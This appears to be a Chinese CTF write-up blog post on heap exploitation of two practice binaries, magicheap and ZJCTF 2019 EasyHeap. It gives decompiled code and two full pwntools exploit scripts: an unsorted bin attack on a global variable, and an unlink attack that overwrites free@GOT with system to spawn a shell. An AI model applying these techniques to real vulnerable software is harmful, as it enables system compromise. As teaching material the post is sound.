
    HITCON Training lab14 Unsorted bin attack magicheap & [ZJCTF 2019]EasyHeap

    November 20, 2020 • Read: 1509 • Pwn

    现在居然可以一次过了,有点惊讶

    int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
    {
      char buf; // [rsp+0h] [rbp-10h]  -- read() below fills 8 bytes starting here
      unsigned __int64 cookie; // [rsp+8h] [rbp-8h]  -- stack-protector cookie read from fs:0x28
      int choice; // eax

      cookie = __readfsqword(0x28u);
      setvbuf(stdout, 0LL, 2, 0LL);
      setvbuf(stdin, 0LL, 2, 0LL);
      /* Menu loop; only option 4 leaves it, via exit(). */
      for ( ;; )
      {
        menu();
        /* 8 bytes, not NUL-terminated: atoi() stops at the first non-digit byte. */
        read(0, &buf, 8uLL);
        choice = atoi(&buf);
        switch ( choice )
        {
          case 1:
            create_heap();
            break;
          case 2:
            edit_heap();
            break;
          case 3:
            delete_heap();
            break;
          case 4:
            exit(0); /* no break needed: exit() does not return */
          case 4869:
            /* Hidden option: l33t() runs only once the global `magic` exceeds 4869
               (unsigned compare), which is the win condition the write-up targets. */
            if ( (unsigned __int64)magic <= 4869 )
              puts("So sad !");
            else
            {
              puts("Congrt !");
              l33t();
            }
            break;
          default:
            puts("Invalid Choice");
            break;
        }
      }
    }

    create_heap(),申请大小可以自定义
    edit_heap(),有堆溢出漏洞。
    delete_heap(), 删除后指针置0
    这道题应该也可以用 fastbin attack,所以不能算是典型的例题,等下去找一道 unsorted bin attack 和 fastbin attack 搭配的题目。

    # -*- coding: utf-8 -*-
    from pwn import *
    # Local instance of the challenge binary; debug logging shows every byte exchanged.
    r = process(["./magicheap"])
    context.log_level = "debug"
    def create_heap(size, content):
        """Drive menu option 1: request a chunk of `size` bytes and send `content` for it."""
        exchange = (
            ("Your choice :", "1"),
            ("Size of Heap : ", str(size)),
            ("Content of heap:", content),
        )
        for prompt, reply in exchange:
            r.sendlineafter(prompt, reply)
    
    def edit_heap(idx, size, content):
        """Drive menu option 2: rewrite chunk `idx` with `size` bytes of `content`.

        `size` is what the target reads, not what the chunk can hold -- the prose
        above notes that the target's edit_heap() has no bounds check.
        """
        exchange = (
            ("Your choice :", "2"),
            ("Index :", str(idx)),
            ("Size of Heap : ", str(size)),
            ("Content of heap : ", content),
        )
        for prompt, reply in exchange:
            r.sendlineafter(prompt, reply)
    
    def delete_heap(idx):
        """Drive menu option 3: free chunk `idx` (the target then nulls its pointer, per the note above)."""
        exchange = (("Your choice :", "3"), ("Index :", str(idx)))
        for prompt, reply in exchange:
            r.sendlineafter(prompt, reply)
    # Address of the global `magic` that main()'s hidden option 4869 compares against.
    # Hard-coded, so a non-PIE binary is assumed -- confirm with checksec before reuse.
    magic = 0x00000000006020C0
    create_heap(0x18, 'a')  # index 0: the chunk the overflow is written from
    create_heap(0x88, 'b')  # index 1: the chunk whose header the overflow rewrites
    create_heap(0x18, 'c')  # index 2: presumably a guard so chunk 1 is not merged into top when freed -- TODO confirm
    delete_heap(1)  # free chunk 1; the technique named in the title relies on it landing in the unsorted bin
    # The target's edit_heap() has no length check (see the note above the script), so these
    # 0x30 bytes written into the 0x18-byte chunk 0 spill into chunk 1's header:
    # size stays 0x91, fd = 0, bk = magic - 0x10.
    payload = 'a' * 0x18 + p64(0x91) + p64(0) + p64(magic - 0x10)
    edit_heap(0, len(payload), payload)
    create_heap(0x88, 'd')  # same-size request that performs the unsorted-bin step; if it worked, magic now exceeds 4869
    r.sendlineafter("Your choice :", "4869")  # hidden option in main(): prints "Congrt !" and calls l33t() when magic > 4869
    r.interactive()
    

    2020-11-29更新
    这两道题目是一模一样的,但是 [ZJCTF 2019]EasyHeap 在buuoj上面直接利用magic,cat不出来,可能是配置的问题,所以我利用unlink做了一遍。

    from pwn import *
    from LibcSearcher import *
    # Log every byte exchanged with the target.
    context.log_level = "debug"
    # Remote instance from the write-up; use the commented process() line for a local run.
    #r = process('./easyheap')
    r = remote("node3.buuoj.cn", 26026)
    # A non-PIE binary is assumed: its GOT/PLT addresses are used as-is below.
    elf = ELF("./easyheap")
    
    def choice(idx):
        """Pick main-menu option `idx` at the "Your choice :" prompt."""
        menu_prompt = "Your choice :"
        r.sendlineafter(menu_prompt, "{}".format(idx))
    
    def create_heap(size, content):
        """Menu option 1: allocate `size` bytes and send `content` as the chunk data."""
        choice(1)
        exchange = (("Size of Heap : ", str(size)), ("Content of heap:", content))
        for prompt, reply in exchange:
            r.sendlineafter(prompt, reply)
    
    def edit_heap(idx, content):
        """Menu option 2: overwrite chunk `idx` with `content`, declaring exactly len(content) bytes.

        The declared size is not checked against the chunk size by the target (see the
        note above), so `content` may be longer than the chunk it is written into.
        """
        choice(2)
        length = len(content)
        exchange = (
            ("Index :", str(idx)),
            ("Size of Heap : ", str(length)),
            ("Content of heap : ", content),
        )
        for prompt, reply in exchange:
            r.sendlineafter(prompt, reply)
    
    def delete_heap(idx):
        """Menu option 3: free chunk `idx`."""
        choice(3)
        r.sendlineafter("Index :", "{}".format(idx))
    
    create_heap(0x88, 'b')  # index 0: the chunk that will hold the fake chunk header
    create_heap(0x88, 'b')  # index 1: adjacent chunk whose free() performs the unlink step
    #delete_heap(1)
    # Address of the global array that holds the chunk pointers. The FD/BK values below only
    # work if heaparray[0] sits exactly here (hard-coded => non-PIE binary assumed) -- confirm.
    ptr = 0x00000000006020E0
    FD = ptr - 0x18  # fake fd: FD->bk is the 8 bytes at ptr, i.e. heaparray[0], which points at the fake chunk
    BK = ptr - 0x10  # fake bk: BK->fd is likewise the 8 bytes at ptr
    
    # 0x90 bytes into the 0x88-byte chunk 0 (the target's edit_heap() has no length check):
    # a fake chunk (fd = FD, bk = BK) at the start of chunk 0's data, filler, then chunk 1's
    # prev_size = 0x80 and size = 0x90 with PREV_INUSE clear, so that freeing chunk 1
    # treats chunk 0's data as a free neighbour and unlinks the fake chunk.
    edit_heap(0, p64(0) * 2 + p64(FD) + p64(BK) + 'a' * (0x88 - 0x20 - 0x8) + p64(0x80) + p64(0x90))
    delete_heap(1)  # triggers the unlink; afterwards heaparray[0] == FD (ptr - 0x18)
    #gdb.attach(r)
    edit_heap(0, 'a' * 0x18 + p64(elf.got['free']))  # write through the moved pointer: 0x18 filler up to ptr, then heaparray[0] = free@GOT
    edit_heap(0, p64(elf.plt['system']))  # heaparray[0] is free@GOT now, so this points free() at system@plt
    create_heap(0x18, 'sh\x00')  # lands in index 1 (index 0 is still occupied); its data is the string handed to free()
    delete_heap(1)  # free(chunk 1) now runs system("sh")
    r.interactive()
    Last Modified: November 29, 2020